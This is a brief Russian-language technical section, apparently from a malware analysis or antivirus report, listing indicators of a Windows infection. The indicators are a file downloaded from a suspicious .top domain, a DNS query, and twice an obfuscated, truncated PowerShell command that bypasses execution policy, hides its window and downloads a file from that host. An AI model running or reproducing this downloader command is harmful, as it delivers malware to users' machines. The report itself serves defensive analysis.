Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwE^r^sh^el^l.^ExE ^-EXecUTiONPOli^cy b^yP^A^SS -NOPRofI^L^e -w^I^N^DoWstYLE^ hiDd^eN^ (NeW^-O^B^je^CT^ SY^STE^m.^nET.w^eBc^LI^Ent)^.dOWnl^Oa^dF^I^le^('http://mondayhelthc.top...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "POwE^r^sh^el^l.^ExE ^-EXecUTiONPOli^cy b^yP^A^SS -NOPRofI^L^e -w^I^N^DoWstYLE^ hiDd^eN^ (NeW^-O^B^je^CT^ SY^STE^m.^nET.w^eBc^LI^Ent)^.dOWnl^Oa^dF^I^le^('http://mondayhelthc.top...' (со скрытым окном)